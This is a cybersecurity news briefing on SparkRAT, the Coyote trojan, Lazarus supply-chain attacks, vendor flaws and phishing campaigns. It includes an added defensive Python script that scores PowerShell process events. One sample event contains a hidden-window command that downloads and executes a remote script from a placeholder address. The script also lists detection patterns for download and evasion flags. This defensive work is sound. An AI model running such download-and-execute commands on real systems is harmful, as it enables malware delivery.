Cyware Daily Threat Intelligence, January 31, 2025

Daily Threat Briefing • Jan 31, 2025
Cybercriminals are sharpening their tactics, and Brazilian financial firms are the latest target. The Coyote banking trojan is on the prowl, using malicious Windows LNK files to execute PowerShell scripts that steal data and compromise systems.
Meanwhile, a new browser-based threat is emerging—syncjacking. This attack exploits malicious extensions to hijack browsers, disable security settings, and access stored credentials. In its final stage, attackers gain full control of devices, including cameras and audio, without detection.
Speaking of hidden threats, users of Microsoft Ads are being tricked by fraudulent Google ads leading to phishing pages designed to steal their login credentials. This campaign has persisted for two years, slipping past security filters and mimicking Microsoft’s login process with deceptive precision.
SparkRAT hits Windows, macOS, and Linux devices
Researchers reported a surge in attacks leveraging SparkRAT, a cross-platform Remote Access Trojan (RAT) written in Go. This open-source tool, first released on GitHub in 2022, has become a favorite among attackers because of its modular design and multi-platform support. It has been used against macOS users and government bodies. SparkRAT communicates with its C2 servers over WebSocket connections and HTTP POST requests. In 2024, links to a North Korean cyber espionage campaign were also identified.
Coyote banking trojan targets Brazil
A new wave of cyberattacks using the Coyote banking trojan is focused on financial firms in Brazil. This advanced malware uses harmful Windows LNK (shortcut) files to run PowerShell scripts, allowing data theft and system compromise. The attack starts with an LNK file that executes a PowerShell command to connect to a remote server to download further malware. Coyote establishes secure communication with C2 servers, performs keylogging, and takes screenshots. To defend against these threats, avoid opening unknown LNK files, keep antivirus programs updated, monitor registry changes, and use endpoint detection tools.
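The briefing recommends monitoring and endpoint detection against the Coyote delivery chain (a shortcut file that launches PowerShell to fetch a second stage from a remote server). The following is an added example, not code from Cyware or from any vendor, of how that chain looks in process-creation telemetry and how a simple triage rule can score it. The field names follow a Sysmon-style layout and the sample events, including the 203.0.113.10 address, are constructed for illustration; the indicator lists are assumptions a defender would tune to their own environment.

```python
import re

# Constructed sample process-creation events (Sysmon-style field names are an assumption).
# A double-clicked .lnk runs its target as a child of explorer.exe, which is why the
# parent image matters for the Coyote-style chain described in the briefing.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -File "C:\Users\alice\scripts\backup.ps1"'},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop -c "
                     "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')\""},
    {"id": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -Command Invoke-WebRequest "
                     "https://updates.example.com/patch.msi -OutFile patch.msi"},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe invoice.txt"},
]

# PowerShell constructs that reach out to a remote server (assumed, tune per environment).
DOWNLOAD_PATTERNS = [
    r"invoke-webrequest", r"\biwr\b", r"invoke-restmethod", r"\birm\b",
    r"\bcurl\b", r"\bwget\b", r"downloadstring", r"downloadfile",
    r"net\.webclient", r"https?://",
]
# Flags commonly used to hide a window or avoid profile/policy prompts (assumed list).
EVASION_PATTERNS = [
    r"-enc(odedcommand)?\b", r"-w(indowstyle)?\s+hidden", r"-nop(rofile)?\b", r"bypass",
]
PS_IMAGES = ("powershell.exe", "pwsh.exe")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event: dict) -> tuple[str, list[str]]:
    """Return (severity, reasons) for one process-creation event.

    high   : explorer.exe -> PowerShell that downloads and uses evasion flags
    medium : explorer.exe -> PowerShell that downloads
    low    : any other PowerShell download (admin activity is common here)
    none   : not PowerShell, or no remote fetch in the command line
    """
    reasons: list[str] = []
    if _basename(event["image"]) not in PS_IMAGES:
        return "none", reasons
    cmd = event["command_line"]
    downloads = [p for p in DOWNLOAD_PATTERNS if re.search(p, cmd, re.IGNORECASE)]
    if not downloads:
        return "none", reasons
    reasons.append("remote fetch: " + ", ".join(downloads))
    from_explorer = _basename(event["parent_image"]) == "explorer.exe"
    if from_explorer:
        reasons.append("spawned by explorer.exe (shortcut or double-click launch)")
    evasion = [p for p in EVASION_PATTERNS if re.search(p, cmd, re.IGNORECASE)]
    if evasion:
        reasons.append("evasion flags: " + ", ".join(evasion))
    if from_explorer and evasion:
        return "high", reasons
    if from_explorer:
        return "medium", reasons
    return "low", reasons


def triage(events: list[dict]) -> dict[int, str]:
    """Map event id -> severity for every event scored above 'none'."""
    result = {}
    for event in events:
        severity, _ = score_event(event)
        if severity != "none":
            result[event["id"]] = severity
    return result


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        severity, reasons = score_event(event)
        print(f"event {event['id']}: {severity}", *reasons, sep="\n    ")
```

The rule deliberately scores the plain admin case (event 3, a download launched from cmd.exe) as low rather than ignoring it, so an analyst can still pivot to it; the explorer.exe parent combined with hidden-window and no-profile flags is what lifts event 2 to high.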
Lazarus targets developers with rogue NPM package
North Korea's Lazarus Group launched a major supply chain attack, named Phantom Circuit, targeting hundreds of systems globally. The group planted malware in phony versions of genuine software and open-source tools, particularly in the cryptocurrency sector, tricking developers into using them. This allowed it to steal sensitive data, including passwords and authentication tokens, from compromised systems. The attack expanded from 181 targets in Europe to 1,225 victims by December 2024, including many in India and Brazil. The group's new method, embedding malware in legitimate software, allows for long-term access and detection evasion. Researchers identified the control servers that managed this operation, confirming links to earlier Lazarus activity.
Critical flaw impacts Lightning AI Studio
A critical security flaw was found in the AI development platform Lightning.AI that could have allowed attackers to execute remote code and gain access to user data. Researchers at Noma discovered a hidden URL parameter that could be manipulated to create phishing links targeting specific users. A security patch was implemented by October 25, 2024. The flaw could have exposed sensitive data, leading to significant risk. To date, there has been no evidence of exploitation.
ABB issues critical security advisory
ABB issued a security advisory about three critical security flaws, CVE-2024-48841, CVE-2024-48849, and CVE-2024-48852, impacting FLXeon controllers. These flaws affect firmware versions 9.3.4 and older. These flaws can allow remote code execution (RCE), unauthorized access, and information disclosure. ABB recommends upgrading to firmware version 9.3.5 for optimum protection.
Browser syncjacking attack enables device takeover
Researchers warned of a new attack named "browser syncjacking" that allows malicious extensions to take full control of a targeted browser and device with little user interaction. The method circumvents the traditional security limits placed on browser extensions. The attack occurs in three stages. First, a user unknowingly installs a rogue extension, which lets the attacker control the user profile, disable security settings, and access stored credentials and history. In the second stage, the extension takes over the browser, granting attackers full control and enabling data theft and redirection to phishing sites. The third stage is device hijacking, which lets attackers access the device's cameras, audio, and other applications without detection.
VMware patches five serious flaws
VMware warned of five security flaws in its Aria Operations and Aria Operations for Logs products that attackers could exploit to gain admin access. Two serious flaws let users elevate their access rights. VMware highlighted CVE-2025-22218, which could let a user access credentials for another product. Another flaw lets users with basic access retrieve credentials. There are also medium-risk flaws that enable stored cross-site scripting (XSS) attacks and a broken access control issue. No workarounds exist, so patching is necessary. Fixes were included in Aria Operations for Logs 8.18.3 and Aria Operations 8.18.3.
Microsoft advertisers phished via Google ads
A recent phishing campaign targeted users of Microsoft's advertising platform, using malicious Google Search ads to steal their login details. Although Microsoft does buy ad space on Google, these ads were placed by impostors and carry harmful links. The phishing effort persisted for two years, bypassing Google's security checks. Genuine users are shown a Cloudflare verification challenge before reaching the phishing page, which imitates Microsoft's site.
Devil-Traff platform eases phishing
Researchers at SlashNext warned about the Devil-Traff platform, which facilitates phishing attacks by letting criminals send bulk SMS messages with features such as sender ID spoofing for brand impersonation. Devil-Traff also supports automated campaigns, letting operators send thousands of messages quickly. The platform's notable features, including sender ID customization, API integration, and low cost, make it easier to stage large-scale phishing attacks globally.